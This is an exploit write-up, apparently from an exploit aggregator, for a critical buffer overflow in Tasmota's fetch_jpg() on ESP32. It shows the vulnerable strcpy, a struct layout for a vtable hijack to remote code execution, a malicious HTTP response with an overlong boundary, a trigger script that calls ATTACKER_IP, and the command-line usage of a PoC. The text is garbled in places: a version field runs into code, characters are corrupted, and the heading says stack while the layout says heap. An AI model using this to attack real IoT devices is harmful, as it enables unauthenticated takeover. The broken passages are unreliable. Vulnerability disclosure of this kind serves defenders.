Share
## https://sploitus.com/exploit?id=A4DE2B37-A9D8-5F7F-AA2C-E1454B6039E5
# CVE-2026-38426: strcpy() Stack Buffer Overflow in Tasmota fetch_jpg() boundary[40]

**CVE:** CVE-2026-38426  
**Severity:** Critical (CVSS 9.8)  
**Product:** Arendst Tasmota  
**Affected Version:** 39 chars)
char *cp = strchr(boundary.c_str(), '=');
if (cp) {
    strcpy(glob_script_mem.jpg_task.boundary, cp + 1);  // NO LENGTH CHECK โ€” OVERFLOW!
}
```

---

## Heap Memory Layout (ESP32)

```
struct JPG_TASK layout:
  +0x00  boundary[40]     โ† overflow starts here
  +0x28  draw (bool)      โ† corrupted
  +0x29  scale (uint8_t)  โ† corrupted
  +0x2A  xp (uint16_t)    โ† corrupted
  +0x2C  yp (uint16_t)    โ† corrupted
  +0x2E  WiFiClient        โ† vtable ptr overwritten โ†’ RCE
  +0x7E  HTTPClient        โ† vtable ptr overwritten โ†’ RCE
```

Overwriting the `WiFiClient` or `HTTPClient` vtable pointer with an attacker-controlled value triggers RCE when any virtual method (`read()`, `write()`, `connect()`) is subsequently called.

---

## Attack Scenario

The attacker runs an HTTP server that Tasmota connects to via `fetchjp()`. The server responds with a `Content-Type` header containing a boundary string longer than 39 characters:

```
HTTP/1.1 200 OK
Content-Type: multipart/x-mixed-replace; boundary=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```

Tasmota's `strcpy()` copies 50+ bytes into the 40-byte `boundary` buffer, overflowing into adjacent struct fields.

**Trigger via Tasmota script:**
```
>D
>B
fetchjp(ATTACKER_IP:PORT/stream,0,0,1)
```

---

## Proof of Concept

```python
python3 CVE-2026-38426_poc.py --port 8888 --mode crash
python3 CVE-2026-38426_poc.py --port 8888 --mode info
```

See [CVE-2026-38426_poc.py](CVE-2026-38426_poc.py) for full implementation.

---

## Impact

- **Confidentiality:** High (RCE via vtable hijack on ESP32)
- **Integrity:** High
- **Availability:** High (guaranteed crash)
- **Attack Vector:** Network
- **Authentication:** None required

---

## Timeline

- **2026-03-29:** Vulnerability discovered and reported to MITRE
- **2026-03-29:** CVE-2026-38426 assigned
- **2026-05-xx:** Patch released by Tasmota (v15.3.0.4+)

---

## References

- [Tasmota GitHub](https://github.com/arendst/Tasmota)
- [xdrv_10_scripter.ino](https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino)
- CVE-2026-38426